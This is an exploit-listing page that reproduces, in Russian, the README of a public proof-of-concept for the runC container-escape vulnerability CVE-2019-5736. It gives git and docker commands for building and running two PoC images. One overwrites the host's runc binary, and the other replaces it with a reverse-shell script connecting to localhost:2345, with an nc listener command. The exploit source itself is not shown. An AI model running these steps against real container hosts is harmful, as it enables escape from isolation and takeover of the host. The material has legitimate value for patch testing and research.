Sploitus

Exploit for RunC

kitploit · 2026-08-25

Exploit Code

MARKDOWN54 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TWISTLOCK-RUNC-CVE-2019-5736
# RunC-CVE-2019-5736

Два PoC для CVE-2019-5736. См. Twistlock Labs с объяснением CVE-2019-5736 и PoC.

PoC вредоносного образа во многом основан на PoC от q3k, так что вся заслуга принадлежит ему.

## Запуск PoC

Обратите внимание, что запуск PoC перезапишет бинарный файл `runc` на хосте. Рекомендуется создать копию вашего бинарного файла `runc` (обычно находится в `/usr/sbin/runc`) перед запуском одного из PoC.

Клонируйте репозиторий:

root@kitploit:~
    
    
    $ git clone https://github.com/twistlock/RunC-CVE-2019-5736
    

### Exec PoC

Перезаписывает `runc` простой программой, которая выводит строку.

Запуск exec PoC:

root@kitploit:~
    
    
    $ cd RunC-CVE-2019-5736 
    $ docker build -t cve-2019-5736:exec_POC ./exec_POC
    $ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
    $ docker exec poc_ctr bash
    

### PoC вредоносного образа

Перезаписывает runc простым bash-скриптом обратной оболочки, который подключается к localhost:2345.

Прослушивайте порт для обратной оболочки:

root@kitploit:~
    
    
    $ nc -nvlp 2345
    

Из другого терминала запустите PoC вредоносного образа:

root@kitploit:~
    
    
    $ cd RunC-CVE-2019-5736 
    $ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
    $ docker run --rm cve-2019-5736:malicious_image_POC